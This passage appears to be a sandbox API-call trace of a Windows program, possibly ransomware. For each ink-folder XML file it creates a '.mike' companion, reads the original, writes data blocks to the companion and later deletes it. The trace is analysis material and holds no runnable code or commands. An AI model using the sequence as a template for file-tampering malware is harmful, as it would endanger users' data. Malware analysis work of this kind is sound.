ftLastWriteTime.dwLowDateTime=0xe4352480, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc00)) returned 1 [0043.623] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0043.623] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", lpFilePart=0x0) returned 0x3d [0043.623] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.mike", lpFilePart=0x0) returned 0x42 [0043.623] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.623] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x214e2a4 | out: lpFileInformation=0x214e2a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe432c320, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe432c320, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4352480, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc00)) returned 1 [0043.623] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.623] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", lpFilePart=0x0) returned 0x3d [0043.623] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", dwFileAttributes=0x80) returned 0 [0043.624] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", lpFilePart=0x0) returned 0x3d [0043.625] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.mike", lpFilePart=0x0) returned 0x42 [0043.625] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0043.625] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0ec | out: lpFileInformation=0x2af0ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe432c320, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe432c320, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4352480, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc00)) returned 1 [0043.625] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0043.625] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", lpFilePart=0x0) returned 0x3d [0043.625] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.mike", lpFilePart=0x0) returned 0x42 [0043.625] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml.mike")) returned 1 [0043.626] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", lpFilePart=0x0) returned 0x3d [0043.626] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", lpFilePart=0x0) returned 0x3d [0043.626] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", lpFilePart=0x0) returned 0x3d [0043.626] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0043.626] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0043.628] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0043.628] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", nBufferLength=0x105, lpBuffer=0x2aeb60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", lpFilePart=0x0) returned 0x3d [0043.628] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0043.628] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.628] GetFileType (hFile=0x264) returned 0x1 [0043.628] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0043.628] GetFileType (hFile=0x264) returned 0x1 [0043.628] CloseHandle (hObject=0x264) returned 1 [0043.628] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", lpFilePart=0x0) returned 0x3d [0043.629] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", lpFilePart=0x0) returned 0x3d [0043.629] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0043.629] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0043.629] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0043.629] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0043.629] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.629] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml"), fInfoLevelId=0x0, lpFileInformation=0x2150204 | out: lpFileInformation=0x2150204*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c49d71, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c49d71, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa38)) returned 1 [0043.629] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.629] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", lpFilePart=0x0) returned 0x3d [0043.629] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.629] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml"), fInfoLevelId=0x0, lpFileInformation=0x21504f4 | out: lpFileInformation=0x21504f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c49d71, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c49d71, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa38)) returned 1 [0043.629] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.629] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", lpFilePart=0x0) returned 0x3d [0043.629] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.mike", lpFilePart=0x0) returned 0x42 [0043.629] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0043.629] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.630] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0043.630] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", lpFilePart=0x0) returned 0x3d [0043.630] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", lpFilePart=0x0) returned 0x3d [0043.630] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", lpFilePart=0x0) returned 0x3d [0043.630] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.mike", lpFilePart=0x0) returned 0x42 [0043.630] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0043.630] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.630] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0043.630] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.mike", lpFilePart=0x0) returned 0x42 [0043.630] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.630] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.631] GetFileType (hFile=0x264) returned 0x1 [0043.631] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.631] GetFileType (hFile=0x264) returned 0x1 [0043.631] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0043.631] WriteFile (in: hFile=0x264, lpBuffer=0x2151248*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x2151248*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0043.632] CloseHandle (hObject=0x264) returned 1 [0043.632] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0043.632] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml"), fInfoLevelId=0x0, lpFileInformation=0x2150d8c | out: lpFileInformation=0x2150d8c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c49d71, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c49d71, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa38)) returned 1 [0043.632] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0043.632] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", lpFilePart=0x0) returned 0x3d [0043.632] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.632] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.632] GetFileType (hFile=0x264) returned 0x1 [0043.632] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.632] GetFileType (hFile=0x264) returned 0x1 [0043.632] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0043.632] ReadFile (in: hFile=0x264, lpBuffer=0x215235c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x215235c*, lpNumberOfBytesRead=0x2af0c8*=0xa38, lpOverlapped=0x0) returned 1 [0043.648] CloseHandle (hObject=0x264) returned 1 [0043.648] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.mike", lpFilePart=0x0) returned 0x42 [0043.648] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.648] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.648] GetFileType (hFile=0x264) returned 0x1 [0043.649] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.649] GetFileType (hFile=0x264) returned 0x1 [0043.649] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0043.649] WriteFile (in: hFile=0x264, lpBuffer=0x2158f54*, nNumberOfBytesToWrite=0xa40, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x2158f54*, lpNumberOfBytesWritten=0x2af0bc*=0xa40, lpOverlapped=0x0) returned 1 [0043.649] CloseHandle (hObject=0x264) returned 1 [0043.650] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.mike", lpFilePart=0x0) returned 0x42 [0043.650] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0043.650] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.650] GetFileType (hFile=0x264) returned 0x1 [0043.650] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0043.650] GetFileType (hFile=0x264) returned 0x1 [0043.651] WriteFile (in: hFile=0x264, lpBuffer=0x215c168*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x215c168*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0043.651] CloseHandle (hObject=0x264) returned 1 [0043.652] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", lpFilePart=0x0) returned 0x3d [0043.652] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.mike", lpFilePart=0x0) returned 0x42 [0043.652] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0043.652] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4352480, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4352480, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe439e740, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc60)) returned 1 [0043.652] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0043.652] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", lpFilePart=0x0) returned 0x3d [0043.652] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.mike", lpFilePart=0x0) returned 0x42 [0043.653] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.653] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x215d818 | out: lpFileInformation=0x215d818*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4352480, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4352480, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe439e740, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc60)) returned 1 [0043.653] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.653] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", lpFilePart=0x0) returned 0x3d [0043.653] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", dwFileAttributes=0x80) returned 0 [0043.654] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", lpFilePart=0x0) returned 0x3d [0043.654] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.mike", lpFilePart=0x0) returned 0x42 [0043.654] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0043.654] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0ec | out: lpFileInformation=0x2af0ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4352480, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4352480, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe439e740, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc60)) returned 1 [0043.654] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0043.654] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", lpFilePart=0x0) returned 0x3d [0043.654] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.mike", lpFilePart=0x0) returned 0x42 [0043.654] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml.mike")) returned 1 [0043.655] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", lpFilePart=0x0) returned 0x3c [0043.655] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", lpFilePart=0x0) returned 0x3c [0043.656] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", lpFilePart=0x0) returned 0x3c [0043.656] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0043.656] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0043.700] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0043.700] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", nBufferLength=0x105, lpBuffer=0x2aeb60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", 